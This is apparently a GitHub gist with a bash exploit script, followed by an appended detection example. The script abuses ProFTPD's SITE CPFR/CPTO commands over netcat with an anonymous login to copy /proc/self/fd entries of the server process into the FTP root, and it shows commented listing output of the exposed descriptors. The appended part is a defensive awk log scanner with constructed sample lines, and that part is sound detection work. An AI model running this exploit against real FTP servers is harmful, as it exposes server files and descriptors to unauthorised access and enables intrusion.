@tanaka-geek
Last active May 14, 2021 06:05
File descriptor exposure via FTP and Netcat: the SITE command has to be enabled
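#!/bin/bash
# Target FTP server and anonymous login details
IP="192.168.1.1"
PORT=21
USER="anonymous"
PASSWD="whatever"
FTP_DIR="/home/ftp"

# Copy each /proc/self/fd entry of the server process into the FTP root with SITE CPFR/CPTO
function Enumerate {
    for i in $(seq 1 16); do # raise the upper bound if more services are running, but it is usually < 16
        (echo "site cpfr /proc/self/fd/${i}"; echo "site cpto $FTP_DIR/proc${i}"; echo 'quit') | nc "$IP" "$PORT"
    done
}

# Log in and list the FTP root to see where each copied descriptor points
function Invoke_ftp {
    ftp -n "$IP" <<EOF
quote USER $USER
quote PASS $PASSWD
ls
EOF
}

Enumerate
Invoke_ftp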
#lrwxrwxrwx 1 0 0 15 Apr 26 04:34 proc1 -> socket:[717432]
#lrwxrwxrwx 1 0 0 14 Apr 26 04:34 proc3 -> /etc/protocols
#lrwxrwxrwx 1 0 0 15 Apr 26 04:34 proc4 -> socket:[717484]
#lrwxrwxrwx 1 0 0 37 Apr 26 04:34 proc5 -> /usr/local/var/proftpd.scoreboard.lck
#lrwxrwxrwx 1 0 0 28 Apr 26 04:34 proc6 -> /usr/local/var/proftpd.delay
#lrwxrwxrwx 1 0 0 33 Apr 26 04:34 proc7 -> /usr/local/var/proftpd.scoreboard
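
The detection side of the script above, as an added example that is not part of the original gist: it scans FTP command logs for SITE CPFR requests whose source is under /proc/ and counts them per client, which makes the descriptor sweep stand out from ordinary copies. The log line format, the function names and the sample lines are assumptions constructed for this example.

```shell
#!/bin/bash
# Constructed sample log, not from the gist. Assumed line format:
#   client-ip user [timestamp] "command" reply-code
sample_log() {
cat <<'EOF'
192.0.2.10 - [26/Apr/2021:04:34:01 +0000] "SITE CPFR /proc/self/fd/1" 350
192.0.2.10 - [26/Apr/2021:04:34:01 +0000] "SITE CPTO /home/ftp/proc1" 250
192.0.2.10 - [26/Apr/2021:04:34:02 +0000] "SITE CPFR /proc/self/fd/2" 550
192.0.2.10 - [26/Apr/2021:04:34:02 +0000] "SITE CPFR /proc/self/fd/3" 350
192.0.2.10 - [26/Apr/2021:04:34:02 +0000] "SITE CPTO /home/ftp/proc3" 250
198.51.100.7 alice [26/Apr/2021:05:00:10 +0000] "SITE CPFR /home/ftp/a.txt" 350
198.51.100.7 alice [26/Apr/2021:05:00:10 +0000] "SITE CPTO /home/ftp/b.txt" 250
198.51.100.7 alice [26/Apr/2021:05:01:00 +0000] "site cpfr /proc/self/fd/5" 350
EOF
}

# Read log lines on stdin and report every client that issued SITE CPFR
# with a source path under /proc/, with attempt and accepted (350) counts.
detect_proc_copy() {
  awk -F'"' '
    {
      split($1, pre, " "); ip = pre[1]          # first token before the quoted command
      n = split($2, cmd, " ")                   # the quoted FTP command
      code = $3; gsub(/[^0-9]/, "", code)       # reply code after the closing quote
      # FTP verbs are case-insensitive, so compare them upper-cased
      if (n >= 3 && toupper(cmd[1]) == "SITE" && toupper(cmd[2]) == "CPFR" && cmd[3] ~ /^\/proc\//) {
        attempts[ip]++
        if (code == "350") accepted[ip]++
      }
    }
    END {
      for (ip in attempts)
        printf "%s attempts=%d accepted=%d\n", ip, attempts[ip], accepted[ip] + 0
    }' | sort
}

sample_log | detect_proc_copy
```

An ordinary copy such as a.txt to b.txt is not reported; only sources under /proc/ are counted, whether or not the server accepted them.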